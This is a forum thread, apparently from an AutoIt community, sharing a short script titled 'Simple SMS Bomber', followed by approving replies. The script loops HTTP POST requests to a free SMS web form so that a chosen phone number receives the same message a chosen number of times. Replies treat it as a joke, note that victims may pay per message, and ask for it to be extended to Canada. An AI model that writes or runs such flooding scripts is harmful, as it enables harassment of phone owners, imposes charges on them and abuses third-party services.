Jump to content

Simple SMS Script


ConsultingJoe
 Share

Recommended Posts

Include File: HTTP.au3

#include <HTTP.au3>
$title = "Simple SMS Bomber"
$number = InputBox( $title, "Enter the 10 digit phone number", "7088783992" )
If @error Or $number = "" Then Exit
$msg = InputBox( $title, "Enter The Message to send", "HELLO THERE" )
If @error Or $msg = "" Then Exit
$times = InputBox( $title, "Enter the number of times to send the message", 10 )
If @error Or $times = "" Then Exit
$host = "www.skaarn.com"
$page = "/#"
$vars = "number=" & $number & "&message=" & $msg & "&provider=goaway&submit=Send+Message%21"
$data = _HTTPEncodeString($vars)
For $i = 1 To $times
TrayTip( $title, $i & " Messages sent", 1 )
$socket = _HTTPConnect($host)
$post = _HTTPPost($host, $page, $socket, $data)
_HTTPClose($socket)
Next

[center]AutoIT + Finger Print Reader/Scanner = COOL STUFF -> Check Out Topic![/center][center][font=Arial Black]Check out ConsultingJoe.com[/font][/center][center]My Scripts~~~~~~~~~~~~~~Web Protocol Managing - Simple WiFi Scanner - AutoTunes - Remote PC Control V2 - Audio SpectrascopePie Chart UDF - At&t's TTS - Custom Progress Bar - Windows Media Player Embed[/center]

Link to comment
Share on other sites

haha, cool. Nice job.

Too bad it sends that, "Sent with.. 4 free" message along with it :lmao:

Still cool :ph34r:

yeah but atleast there is no CAPTCHA

[center]AutoIT + Finger Print Reader/Scanner = COOL STUFF -> Check Out Topic![/center][center][font=Arial Black]Check out ConsultingJoe.com[/font][/center][center]My Scripts~~~~~~~~~~~~~~Web Protocol Managing - Simple WiFi Scanner - AutoTunes - Remote PC Control V2 - Audio SpectrascopePie Chart UDF - At&t's TTS - Custom Progress Bar - Windows Media Player Embed[/center]

Link to comment
Share on other sites

It's not free when the receiver is likely to pay for it :lmao:

The normal fee for recieving a text message may occur, depending on the service provider! (Usually no more than $0.30 cents per message!)

Link to comment
Share on other sites

  • 4 weeks later...

awww this would have been awesome if it worked here. Is there anyway you can get this to work with a service that can send sms msgs to users in canada as well instead of this one which will only do users that are in the US?

thanks!

sorry not that I have seen, I think this service doesn't work right now anyways because this site pays for so many messages and they probably used all of them from us.

if you find one let me know, I will see what I can do.

[center]AutoIT + Finger Print Reader/Scanner = COOL STUFF -> Check Out Topic![/center][center][font=Arial Black]Check out ConsultingJoe.com[/font][/center][center]My Scripts~~~~~~~~~~~~~~Web Protocol Managing - Simple WiFi Scanner - AutoTunes - Remote PC Control V2 - Audio SpectrascopePie Chart UDF - At&t's TTS - Custom Progress Bar - Windows Media Player Embed[/center]

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...